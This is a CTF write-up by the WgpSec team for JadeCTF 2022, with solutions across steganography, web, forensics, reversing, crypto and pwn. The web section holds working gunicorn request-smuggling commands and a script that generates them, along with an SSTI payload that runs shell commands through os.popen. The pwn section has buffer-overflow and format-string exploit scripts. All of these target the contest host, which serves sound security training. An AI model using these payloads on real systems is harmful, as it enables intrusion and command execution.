Statement
Author: CTF战队 (the WgpSec CTF team)
This article belongs to the WgpSec狼组安全社区 original-content reward program; reproduction without permission is prohibited.
Any direct or indirect consequences or losses caused by spreading or using the information in this article are the sole responsibility of the user; the WgpSec team and the author accept no liability for them.
The WgpSec team reserves the right to modify and interpret this article. Anyone who reproduces or distributes it must keep it complete, including the copyright notice and all other content. Without the WgpSec team's permission the content may not be altered, added to or trimmed, nor used for commercial purposes in any way.
ctf.wgpsec.org
Foreword
Contest information
2022-10-21 14:30 ~ 2022-10-23 02:30
Platform: https://jadectf.concetto.in/challenges
Some of the attachments mentioned in this article can be obtained by following the official account and replying JadeCTF.
STEG
AVENGERS ASSEMBLE!
The image is a scrambled jigsaw; reassemble it with the gaps solver (piece size 60):
gaps --image=out.jpg --generations=40 --population=600 --size=60
jadeCTF{scr4mbl3d_w3_f4ll_un1t3d_w3_st4nd}
WEB
ULTRA BABY WEB
BABY WEB
Page 8 always returns n and page 21 always returns _; some characters apparently never change while the rest are random. Request every page several times and keep only the positions whose response is stable:
import requests

url = "http://34.76.206.46:10008/?page="
flag = ""
for i in range(1, 999999):
    # three requests per page: a position whose reply never changes is part of the flag
    r1 = requests.get(url + str(i))
    r2 = requests.get(url + str(i))
    r3 = requests.get(url + str(i))
    if r1.text == r2.text == r3.text:
        flag = flag + r3.text
        print(i)
print(flag)
The stable positions (8, 21, ...) are Fibonacci numbers, so it is enough to request only those pages:
import requests

url = "http://34.76.206.46:10008/?page="
flag = ""


def fib(n):
    # fib(1) = fib(2) = 1, fib(3) = 2, ...
    a, b = 1, 1
    for i in range(n - 1):
        a, b = b, a + b
    return a


for i in range(2, 100):
    r1 = requests.get(url + str(fib(i)))
    flag = flag + r1.text
print(flag)
GREEN COFFEE
/internal replies that it is only reachable from the internal network. The Server header is gunicorn/20.0.4, which has a request-smuggling quirk: a request that carries a Sec-Websocket-Key1 header is treated by gunicorn as having an 8-byte body regardless of its Content-Length, while the front-end proxy forwards the full Content-Length body. Everything after the first 8 body bytes is therefore parsed by gunicorn as a second request, which lets us reach the route with Host: localhost. The trailing GET /, sized to match the smuggled request's Content-Length, absorbs the bytes the front end forwards as a separate third request so the connection stays in sync.
echo -en "GET / HTTP/1.1\r\nHost: 34.76.206.46:10014\r\nContent-Length: 85\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /internal?username=n00b HTTP/1.1\r\nHost: localhost\r\nContent-Length: 35\r\n\r\nGET / HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 34.76.206.46 10014
SSTI
echo -en "GET /cat HTTP/1.1\r\nHost: 34.76.206.46:10014\r\nContent-Length: 96\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /internal?username=%7b%7b9*9%7d%7d HTTP/1.1\r\nHost: localhost\r\nContent-Length: 36\r\n\r\nGET /c HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 34.76.206.46 10014
Responses often come back as 404, possibly because of network problems; the channel is quite unstable.
Compute the lengths with Python, take the lipsum payload, URL-encode it and substitute it into the request:
{{lipsum.__globals__['os'].popen('cat flag.txt').read()}}
echo -en "GET /cat HTTP/1.1\r\nHost: 34.76.206.46:10014\r\nContent-Length: 222\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /internal?username=%7b%7b%6c%69%70%73%75%6d%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%5b%27%6f%73%27%5d%2e%70%6f%70%65%6e%28%27%6c%73%27%29%2e%72%65%61%64%28%29%7d%7d HTTP/1.1\r\nHost: localhost\r\nContent-Length: 36\r\n\r\nGET /c HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 34.76.206.46 10014
echo -en "GET /cat HTTP/1.1\r\nHost: 34.76.206.46:10014\r\nContent-Length: 252\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /internal?username=%7b%7b%6c%69%70%73%75%6d%2e%5f%5f%67%6c%6f%62%61%6c%73%5f%5f%5b%27%6f%73%27%5d%2e%70%6f%70%65%6e%28%27%63%61%74%20%66%6c%61%67%2e%74%78%74%27%29%2e%72%65%61%64%28%29%7d%7d HTTP/1.1\r\nHost: localhost\r\nContent-Length: 36\r\n\r\nGET /c HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 34.76.206.46 10014
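The Content-Length values in the commands above were counted by hand. The script below is an added example for this writeup (not the authors' code): it builds the same three-request layout and computes both lengths automatically, so a different payload or path cannot desynchronise the chain. It assumes the behaviour described above (gunicorn 20.0.4 reads exactly 8 body bytes when Sec-Websocket-Key1 is present, the front end forwards the whole Content-Length body); host, port and paths are taken from this challenge, and send_raw() only runs when the script is executed directly.

```python
import socket

FRONT_HOST = "34.76.206.46:10014"   # challenge front end, as in the commands above
INNER_HOST = "localhost"            # Host value that satisfies the /internal check
SSTI_LS = "{{lipsum.__globals__['os'].popen('ls').read()}}"
SSTI_CAT = "{{lipsum.__globals__['os'].popen('cat flag.txt').read()}}"


def encode_param(value: str) -> str:
    """Percent-encode every byte, the way the writeup encodes the SSTI payload."""
    return "".join("%%%02x" % b for b in value.encode())


def build_smuggle(username: str, front_host: str = FRONT_HOST, outer_path: str = "/cat",
                  tail_path: str = "/c", inner_host: str = INNER_HOST) -> bytes:
    """Build outer + smuggled + tail requests with consistent Content-Length values.

    front end view : outer (Content-Length = 8 + len(inner)) followed by tail
    gunicorn view  : outer with an 8-byte body, then inner, whose Content-Length
                     equals len(tail) so the forwarded tail is swallowed as its
                     body and the connection stays in sync.
    """
    tail = (f"GET {tail_path} HTTP/1.1\r\n"
            f"Host: {inner_host}\r\n"
            "\r\n").encode()
    inner = (f"GET /internal?username={username} HTTP/1.1\r\n"
             f"Host: {inner_host}\r\n"
             f"Content-Length: {len(tail)}\r\n"
             "\r\n").encode()
    body = b"x" * 8 + inner      # the 8 filler bytes are the only body gunicorn sees
    outer = (f"GET {outer_path} HTTP/1.1\r\n"
             f"Host: {front_host}\r\n"
             f"Content-Length: {len(body)}\r\n"
             "Sec-Websocket-Key1: x\r\n"
             "\r\n").encode()
    return outer + body + tail


def content_lengths(raw: bytes) -> list:
    """Return the Content-Length values in the order they appear (to check the layout)."""
    return [int(line.split(b":", 1)[1]) for line in raw.split(b"\r\n")
            if line.lower().startswith(b"content-length:")]


def send_raw(host: str, port: int, raw: bytes, timeout: float = 5.0) -> bytes:
    """Send the raw bytes over one TCP connection and collect everything that comes back."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(raw)
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    payload = build_smuggle(encode_param(SSTI_CAT))
    print(content_lengths(payload))   # [252, 36], matching the hand-counted command
    print(send_raw("34.76.206.46", 10014, payload).decode(errors="replace"))
```

build_smuggle("n00b", outer_path="/", tail_path="/") reproduces the first command (85 and 35), and the two lipsum payloads give 222/36 and 252/36, the same numbers as above.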
DFIR
CALL SANDEEP
python vol.py -f ./workspace/sandeep.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007ed6c9c0 -D ./workspace/
After repairing the dumped file's header we get the first clue; next dump the mailbox file:
python vol.py -f ./workspace/sandeep.raw --profile=Win7SP1x64 dumpfiles -Q 0x000000007dec85f0 -D ./workspace/
This yields the following messages:
From - Thu, 20 Oct 2022 05:34:22 GMT
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: <80466942-4a56-c2e7-1666-501[email protected]>
Date: Wed, 19 Oct 2022 22:34:18 -0700
MIME-Version: 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:102.0) Gecko/20100101
Thunderbird/102.3.3
Content-Language: en-US
To: [email protected]
From: Jade Stoner <[email protected]>
Subject: Thank You
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Thanks for inviting me bro. I will be there in time.
From - Thu, 20 Oct 2022 05:44:13 GMT
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: <3075f4bc-8f46-efaf-029c-1e88[email protected]>
Date: Wed, 19 Oct 2022 22:44:09 -0700
MIME-Version: 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:102.0) Gecko/20100101
Thunderbird/102.3.3
Content-Language: en-US
To: [email protected]
From: Jade Stoner <[email protected]>
Subject: Important
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
Hi bro!!
Here is the code to contact Sandeep:
NWIyYjdmMDUyMzczMDU2MTFmMzM2ODIxNGQzYTYwMWQ0MzI1NzQwZg==
I hope you are ready for the party and don't forget to decode it
From - Thu, 20 Oct 2022 05:44:50 GMT
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00800000
Message-ID: <[email protected]>
Date: Wed, 19 Oct 2022 22:44:47 -0700
MIME-Version: 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:102.0) Gecko/20100101
Thunderbird/102.3.3
Content-Language: en-US
To: [email protected]
From: Jade Stoner <[email protected]>
Subject: hint
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
In case you are having any trouble decoding it, here's your hint.
#include <stdio.h>
#include <string.h>

int main() {
    char flag[] = "XXXXXXXXXX";
    int len = strlen(flag);
    for (int i = 0; i < len; i++) {
        if (i > 0) flag[i] ^= flag[i-1];
        flag[i] ^= flag[i] >> 4;
        flag[i] ^= flag[i] >> 3;
        flag[i] ^= flag[i] >> 2;
        flag[i] ^= flag[i] >> 1;
        printf("%02x", (unsigned char)flag[i]);
    }
    return 0;
}
Decoding: base64, then hex, then search each byte so that the hint's transform reproduces the digest (each output byte depends on the plaintext byte and the previous output byte):
import base64
import binascii

res = b"NWIyYjdmMDUyMzczMDU2MTFmMzM2ODIxNGQzYTYwMWQ0MzI1NzQwZg=="
res = base64.b64decode(res)
out = binascii.unhexlify(res).decode()   # the digest bytes produced by the hint program


def check_res(ccflag):
    # print the candidate and re-encode it to confirm it reproduces the digest
    cflag = ccflag.copy()
    for i in range(0, len(cflag)):
        cflag[i] = chr(cflag[i])
    print(''.join(cflag))
    for i in range(0, len(cflag)):
        cflag[i] = ord(cflag[i])
    digest = ""
    for i in range(0, len(cflag)):
        if i > 0:
            cflag[i] ^= cflag[i - 1]
        cflag[i] ^= cflag[i] >> 4
        cflag[i] ^= cflag[i] >> 3
        cflag[i] ^= cflag[i] >> 2
        cflag[i] ^= cflag[i] >> 1
        digest += "%02x" % cflag[i]
    print("digest =", digest)


def isprint(num):
    return 32 <= ord(num) <= 126


def dfs(gflag, idx):
    if idx == len(out):
        check_res(gflag)
        return
    for j in range(0x20, 126):
        tmp = j
        if idx > 0:
            tmp ^= ord(out[idx - 1])   # XOR with the previous *output* byte, as in the C code
        tmp ^= tmp >> 4
        tmp ^= tmp >> 3
        tmp ^= tmp >> 2
        tmp ^= tmp >> 1
        if tmp == ord(out[idx]):
            print(idx, "out[i] =", out[idx], hex(ord(out[idx])))
            if not isprint(chr(j)):
                return
            eflag = gflag.copy()
            eflag[idx] = j
            dfs(eflag, idx + 1)


def main(flag00):
    flag = [0] * len(out)
    for i in range(0, len(flag00)):
        flag[i] = ord(flag00[i])
    dfs(flag, len(flag00))


# main
main("y")
This recovers ybbx1at_s0e_Fnaqrrc, which still needs a Caesar shift of 13 (ROT13) to give look1ng_f0r_Sandeep.
jctf{p34rl_1s_look1ng_f0r_Sandeep}
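The DFS above searches for every byte, but the hint's per-byte transform (x ^= x>>4, x ^= x>>3, x ^= x>>2, x ^= x>>1) is an invertible linear map on 8 bits, and each output byte depends only on the plaintext byte and the previous output byte, so the chain can be undone directly. The script below is an added example (not part of the original writeup): it re-implements the C hint, builds a 256-entry inverse of the shift mix, decodes the digest byte by byte and applies the ROT13 step. Run on the ciphertext from the email it returns ybbx1at_s0e_Fnaqrrc} and look1ng_f0r_Sandeep}; the trailing brace is the twentieth byte of the digest, which the transcription above omits.

```python
import base64
import codecs

# Ciphertext taken from the "Important" email above.
CIPHERTEXT_B64 = "NWIyYjdmMDUyMzczMDU2MTFmMzM2ODIxNGQzYTYwMWQ0MzI1NzQwZg=="


def shift_mix(x: int) -> int:
    """The hint's inner transform on one byte (inputs are ASCII, so C's signed
    right shift never sees a set sign bit and this matches the C code)."""
    for k in (4, 3, 2, 1):
        x ^= x >> k
    return x & 0xff


# Every x ^= x >> k step is invertible, so the whole mix is a bijection on bytes
# and a lookup table inverts it without any search.
INV_MIX = {shift_mix(x): x for x in range(256)}
assert len(INV_MIX) == 256


def encode(plain: bytes) -> str:
    """Re-implementation of the C hint: returns the hex digest it would print."""
    out = bytearray()
    prev = 0
    for i, b in enumerate(plain):
        if i > 0:
            b ^= prev            # XOR with the previous *output* byte
        prev = shift_mix(b)
        out.append(prev)
    return out.hex()


def decode(hex_digest: str) -> bytes:
    """Invert encode(): undo the mix, then the XOR with the previous output byte."""
    cipher = bytes.fromhex(hex_digest)
    plain = bytearray()
    for i, c in enumerate(cipher):
        b = INV_MIX[c]
        if i > 0:
            b ^= cipher[i - 1]
        plain.append(b)
    return bytes(plain)


def solve(b64: str = CIPHERTEXT_B64) -> tuple:
    """Peel the layers used in the challenge: base64 -> hex digest -> XOR chain -> ROT13."""
    hex_digest = base64.b64decode(b64).decode()
    inner = decode(hex_digest).decode()
    return inner, codecs.decode(inner, "rot_13")


if __name__ == "__main__":
    print(solve())   # ('ybbx1at_s0e_Fnaqrrc}', 'look1ng_f0r_Sandeep}')
```

Because decode() is exact rather than a search, it also works for plaintext bytes outside the printable range, which the DFS's isprint() filter would discard.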
AutoCAD
The PNG fails its CRC check, so fix the width/height, then view the content in StegSolve.
LM10
The HTTP traffic contains images; extract them to get the result. Don't open the YouTube video, it is a scam trap.
Misc
WELCOME
READ THE RULES
Reverse
DENJI EX-MAKIMA
AES in CBC mode; both the key and the IV are given in the binary, and anti-debugging is enabled, so decrypt the file offline:
import base64
from Crypto.Cipher import AES

with open('./file.fun', 'rb') as f:
    c = f.read()

# key (16 bytes, AES-128) and IV recovered from the binary
key = base64.b64decode("OoIsAwwF32cICQoLDA0ODe==")
iv = bytes([0, 1, 0, 3, 5, 3, 0, 1, 0, 0, 2, 0, 6, 7, 6, 0])

cipher = AES.new(key, AES.MODE_CBC, iv)
m = cipher.decrypt(c)
print(m.decode())  # jadeCTF{j1gs4w_puzzl3_1s_n0t_s0_34sy}
with open('flag.txt', 'wb') as f:
    f.write(m)
Crypto
Hands
jadeCTF{cryptoisfunorisit}
PWN
babypwn
exp
from pwn import *

p = remote('34.76.206.46', 10002)
# p = process('./babypwn')
# 520 bytes of padding reach the saved return address; overwrite it with 0x400746
py = b'a' * 520 + p64(0x0000000000400746)
p.sendline(py)
p.interactive()
jadeCTF{buff3r_0v3rfl0ws_4r3_d4ng3r0u5}
Love Calculator
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

debug = 2
context(arch='amd64', endian='el', os='linux')
# context.terminal = ['tmux', 'splitw', '-h', '-l', '100']
context.log_level = 'debug'
if debug == 1:
    p = process(['./chall'])
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
else:
    p = remote('34.76.206.46', 10005)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec=False)
elf = ELF('./chall', checksec=False)

pd = b"binLep"
p.sendlineafter(b'Please enter your name: ', pd)
p.sendlineafter(b'Please choose what you would like to do: ', b'2')

# Stack overflow in the "lucky one" name: 0x78 bytes of padding reach the saved
# return address, then chain you_cant_see_me twice (ret gadgets keep the stack
# 16-byte aligned) and finally win.
ret = next(elf.search(asm("ret")))
pd = b''
pd += b'a' * 0x78
pd += p64(ret)
pd += p64(elf.sym['you_cant_see_me'])
pd += p64(ret)
pd += p64(elf.sym['you_cant_see_me'])
pd += p64(elf.sym['win'])
p.sendlineafter(b'Enter the name of the lucky one ;): ', pd)

# Format string: leak a stack address through the 17th positional argument.
p.sendlineafter(b'Wh0 are you?\n', b"%17$p.tmp")
p.recvuntil(b'Nice name it 1s: ')
# gdb.attach(p, "b *0x400A01\nc")
stack = int(p.recvuntil(b'.tmp', drop=True), 16) + 0x0c
success("stack = " + hex(stack))

# Second format string: the pointer placed at offset 0x10 of the buffer is read
# as positional argument 8, so %8$n writes the number of bytes printed so far (3)
# to stack + 0xc.
pd = b'aaa%8$n'
pd = pd.ljust(0x10, b"\x00")
pd += p64(stack)
p.sendlineafter(b'Wh0 are you?\n', pd)
p.interactive()
Afterword
Author
CTF战队
WgpSec狼组安全团队
WeChat ID: wgpsec
Twitter: @wgpsec
Originally published on the WeChat official account WgpSec狼组安全团队: Jade CTF WP